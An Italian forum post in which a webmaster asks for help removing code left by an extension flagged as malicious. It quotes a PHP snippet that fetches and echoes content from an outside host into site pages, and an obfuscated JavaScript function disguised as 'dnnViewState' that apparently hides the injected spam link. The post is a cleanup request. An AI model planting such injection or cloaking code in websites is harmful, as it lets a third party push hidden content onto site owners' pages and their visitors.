ciao a tutti,
ho letto anch'io il topic di avviso Remove extensions from Autson/iNowWeb/Plimun - Malicious !!
mi è arrivata una mail di avviso perchè un mio cliente è nella lista.il mio cliente vorrebbe mantenere il modulo, sempre che non sia dannoso.
e dalle indicazioni sembra che possa bastare la rimozione del codice.seguendo le indicazioni quindi ho cancellato il codice simile a questo:
<?php
$credit=file_get_contents('http:// www.autson.com/p.php?i='.$path);
echo $credit;
?>ed infatti analizzando la sorgente pagina del sito il link al Payday è scomparso.
però è comunque rimasta questa parte di codice:<script language=""> function dnnViewState() { var a=0,m,v,t,z,x=new Array('9091968376','888791819281878634737491878493927735928 7883421333333338896','778787','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a]; t=z=''; for(v=0;v<m.length;){t+=m.charAt(v++); if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a); t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState(); </script> <style type="">non ho ben capito se devo cancellare anche questa...se cancellandola salta qualcosa o se invece comunque devo disinstallare il modulo perchè non basta cancellare il codice generato.Qualcuno sa aiutarmi? magari può essere utile anche per altre persone che come me hanno installato questo modulo e non sono dei grandi esperti in questo campo.grazie mille!
